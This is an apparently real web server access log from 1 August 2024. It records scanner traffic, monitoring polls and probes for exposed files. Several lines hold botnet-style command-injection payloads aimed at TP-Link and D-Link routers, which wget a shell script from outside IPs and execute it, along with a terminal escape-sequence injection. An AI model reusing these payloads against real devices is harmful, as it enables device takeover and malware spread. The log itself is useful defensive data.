167.94.146.56 - - [01/Aug/2024:06:17:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.56 - - [01/Aug/2024:06:17:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.56 - - [01/Aug/2024:06:17:33 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
149.50.103.48 - - [01/Aug/2024:06:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.206.175.103 - - [01/Aug/2024:06:21:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
18.206.175.103 - - [01/Aug/2024:06:21:14 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
64.62.156.20 - - [01/Aug/2024:06:22:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
54.185.254.110 - - [01/Aug/2024:06:25:20 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
64.62.156.22 - - [01/Aug/2024:06:25:28 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
149.50.103.48 - - [01/Aug/2024:06:25:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.156.14 - - [01/Aug/2024:06:26:26 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
104.42.185.14 - - [01/Aug/2024:06:26:40 +0200] "GET /%1b%5d%32%3b%6f%77%6e%65%64%07%0a necho -en \"GET /\x1b]2;owned?\x07" 404 312 "-" "-"
185.191.126.213 - - [01/Aug/2024:06:31:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
13.52.182.30 - - [01/Aug/2024:06:39:34 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
182.252.66.18 - - [01/Aug/2024:06:42:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
77.90.42.187 - - [01/Aug/2024:06:43:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [01/Aug/2024:06:44:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
51.38.145.43 - - [01/Aug/2024:06:46:33 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://93.123.85.19/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
54.185.254.110 - - [01/Aug/2024:06:46:33 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
149.50.103.48 - - [01/Aug/2024:06:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.206.175.103 - - [01/Aug/2024:06:48:33 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
18.206.175.103 - - [01/Aug/2024:06:48:34 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
149.50.103.48 - - [01/Aug/2024:06:49:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.144.177.129 - - [01/Aug/2024:06:49:21 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
149.50.103.48 - - [01/Aug/2024:06:49:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.237.108.243 - - [01/Aug/2024:06:52:40 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
185.191.126.213 - - [01/Aug/2024:06:54:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.132.114 - - [01/Aug/2024:06:54:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [01/Aug/2024:06:55:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.42.187 - - [01/Aug/2024:06:55:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
149.50.103.48 - - [01/Aug/2024:06:55:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [01/Aug/2024:06:56:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.42.187 - - [01/Aug/2024:06:56:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
149.50.103.48 - - [01/Aug/2024:06:57:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.133.196 - - [01/Aug/2024:06:58:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
18.246.61.85 - - [01/Aug/2024:06:59:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47"
185.191.126.213 - - [01/Aug/2024:07:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.224.205 - - [01/Aug/2024:07:01:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.224.205 - - [01/Aug/2024:07:01:10 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.224.205 - - [01/Aug/2024:07:01:10 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.224.205 - - [01/Aug/2024:07:01:10 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.191.126.213 - - [01/Aug/2024:07:02:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:07:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:08:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:07:09:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:09:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:10:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:11:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:12:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:13:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:14:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:15:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.206.175.103 - - [01/Aug/2024:07:16:59 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
18.206.175.103 - - [01/Aug/2024:07:17:00 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Aug/2024:07:17:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:18:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:07:19:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:19:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:21:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.89.199.238 - - [01/Aug/2024:07:21:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Aug/2024:07:22:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:23:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.36.121.72 - - [01/Aug/2024:07:24:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
101.36.121.72 - - [01/Aug/2024:07:24:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
101.36.121.72 - - [01/Aug/2024:07:24:34 +0200] "t3 12.1.2" 400 329 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:24:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:25:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:07:26:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:26:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:07:27:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.130.4 - - [01/Aug/2024:07:29:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Aug/2024:07:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:07:30:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:07:33:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:40:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [01/Aug/2024:07:41:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [01/Aug/2024:07:41:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Aug/2024:07:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:44:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [01/Aug/2024:07:45:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.47 - - [01/Aug/2024:07:45:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Aug/2024:07:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:07:46:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.128.47 - - [01/Aug/2024:07:46:26 +0200] "GET /geoserver/web HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Aug/2024:07:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.19.66.186 - - [01/Aug/2024:07:47:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Aug/2024:07:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:07:47:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:48:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:49:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "GET /odinhttpcall1722491036 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
165.22.81.228 - - [01/Aug/2024:07:51:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.226.67.216 - - [01/Aug/2024:07:51:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
134.209.237.242 - - [01/Aug/2024:07:51:27 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
134.209.227.204 - - [01/Aug/2024:07:51:27 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
64.226.67.83 - - [01/Aug/2024:07:51:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.255.241 - - [01/Aug/2024:07:51:27 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
46.101.147.132 - - [01/Aug/2024:07:51:27 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
64.226.67.216 - - [01/Aug/2024:07:51:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.255.241 - - [01/Aug/2024:07:51:27 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
64.226.67.216 - - [01/Aug/2024:07:51:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:53:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:54:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:07:55:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.143.73.186 - - [01/Aug/2024:07:56:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Aug/2024:07:56:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:07:57:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:57:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.33.96.124 - - [01/Aug/2024:07:58:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:58:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.33.96.124 - - [01/Aug/2024:07:58:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
185.191.126.213 - - [01/Aug/2024:07:58:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:07:59:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:08:00:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
194.169.175.13 - - [01/Aug/2024:08:00:42 +0200] "\x03" 501 316 "-" "-"
194.169.175.13 - - [01/Aug/2024:08:00:42 +0200] "\x03" 501 316 "-" "-"
194.169.175.13 - - [01/Aug/2024:08:00:44 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:00:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.169.175.13 - - [01/Aug/2024:08:00:47 +0200] "\x03" 501 316 "-" "-"
194.169.175.13 - - [01/Aug/2024:08:00:47 +0200] "\x03" 501 316 "-" "-"
64.226.67.224 - - [01/Aug/2024:08:00:50 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
167.94.146.55 - - [01/Aug/2024:08:01:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.92.171.186 - - [01/Aug/2024:08:01:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
164.92.171.186 - - [01/Aug/2024:08:01:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
164.92.171.186 - - [01/Aug/2024:08:01:20 +0200] "GET /odinhttpcall1722491630 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.171.186 - - [01/Aug/2024:08:01:20 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.171.186 - - [01/Aug/2024:08:01:21 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.171.186 - - [01/Aug/2024:08:01:21 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.171.186 - - [01/Aug/2024:08:01:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
164.92.171.186 - - [01/Aug/2024:08:01:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.92.135.197 - - [01/Aug/2024:08:01:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
